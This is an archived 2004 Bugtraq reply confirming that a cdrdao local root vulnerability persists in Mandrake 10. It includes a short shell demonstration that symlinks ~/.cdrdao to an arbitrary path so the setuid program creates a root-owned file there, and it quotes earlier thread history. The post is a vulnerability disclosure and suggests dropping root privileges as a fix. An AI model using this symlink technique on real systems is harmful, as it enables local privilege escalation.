lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041001190558.32460.qmail@www.securityfocus.com>
Date: 1 Oct 2004 19:05:58 -0000
From: newbug Tseng <newbug@...oot.org>
To: bugtraq@...urityfocus.com
Subject: Re: cdrdao local root exploit


In-Reply-To: <1157225765.20040907131857@...URITY.NNOV.RU>

The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@...alhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@...alhost tmp]$ ln -s /blah .cdrdao
[newbug@...alhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@...alhost tmp]$ cdrdao blank --save
.
.
.
[newbug@...alhost tmp]$ ls -al /blah
-rw-rw-r--  1 root cdwriter 32 10&#26376;  2 10:41 /blah
[newbug@...alhost tmp]$

newbug Tseng

>Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000
>Received: from mail2.securityfocus.com (205.206.231.1)
>  by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000
>Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000
>Delivered-To: archive-bugtraq@...urityfocus.com
>Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
>  by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>	by outgoing2.securityfocus.com (Postfix) with QMQP
>	id 4864914374E; Tue,  7 Sep 2004 09:06:54 -0600 (MDT)
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000
>Date: Tue, 7 Sep 2004 13:18:57 +0400
>From: 3APA3A <3APA3A@...URITY.NNOV.RU>
>Reply-To: 3APA3A <3APA3A@...URITY.NNOV.RU>
>Organization: http://www.security.nnov.ru
>X-Priority: 3 (Normal)
>Message-ID: <1157225765.20040907131857@...URITY.NNOV.RU>
>To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias@...amail.com>
>Cc: bugtraq@...urityfocus.com
>Subject: Re: cdrdao local root exploit
>In-Reply-To: <20040905191642.18379.qmail@....securityfocus.com>
>References: <20040905191642.18379.qmail@....securityfocus.com>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=Windows-1251
>Content-Transfer-Encoding: 8bit
>
>Dear Jйrфme ATHIAS,
>
>This  bug  was  originally  reported  to  Bugtraq  by Andreas Mueller on
>January, 15 2002
>
>--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq@...urityfocus.com:
>
>JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"
>
>
>
>-- 
>~/ZARAZA
>Неприятности начнутся в восемь.  (Твен)
>
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ